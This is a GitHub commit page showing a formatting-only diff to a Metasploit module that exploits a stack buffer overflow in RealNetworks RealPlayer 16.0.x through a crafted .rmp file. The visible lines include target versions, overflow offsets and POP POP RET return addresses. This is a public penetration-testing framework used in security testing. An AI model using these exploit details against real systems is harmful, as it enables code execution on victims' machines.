Skip to content

Commit 367dce5

Browse files
committed
Minor details
1 parent f687a14 commit 367dce5

File tree

1 file changed

+4
-5
lines changed

1 file changed

+4
-5
lines changed

modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb

Lines changed: 4 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -13,8 +13,7 @@ class Metasploit3 < Msf::Exploit::Remote
1313

1414
def initialize(info = {})
1515
super(update_info(info,
16-
'Name' =>
17-
'RealNetworks RealPlayer Version Attribute Buffer Overflow',
16+
'Name' => 'RealNetworks RealPlayer Version Attribute Buffer Overflow',
1817
'Description' => %q{
1918
This module exploits a stack-based buffer overflow vulnerability in
2019
version 16.0.3.51 and 16.0.2.32 of RealNetworks RealPlayer, caused by
@@ -51,14 +50,14 @@ def initialize(info = {})
5150
{
5251
'OffsetClick' => 2540, # Open via double click
5352
'OffsetMenu' => 13600, # Open via File -> Open
54-
'Ret' => 0x641930C8, # POP POP RET from rpap3260.dll
53+
'Ret' => 0x641930C8 # POP POP RET from rpap3260.dll
5554
}
5655
],
5756
[ 'Windows XP SP2/SP3 (NX) / Real Player 16.0.2.32',
5857
{
5958
'OffsetClick' => 2540, # Open via double click
6059
'OffsetMenu' => 13600, # Open via File -> Open
61-
'Ret' => 0x63A630B8, # POP POP RET from rpap3260.dll
60+
'Ret' => 0x63A630B8 # POP POP RET from rpap3260.dll
6261
}
6362
]
6463
],
@@ -68,7 +67,7 @@ def initialize(info = {})
6867

6968
register_options(
7069
[
71-
OptString.new('FILENAME', [ false, 'The file name.', 'msf.rmp']),
70+
OptString.new('FILENAME', [ false, 'The file name.', 'msf.rmp'])
7271
],
7372
self.class)
7473

0 commit comments

Comments
 (0)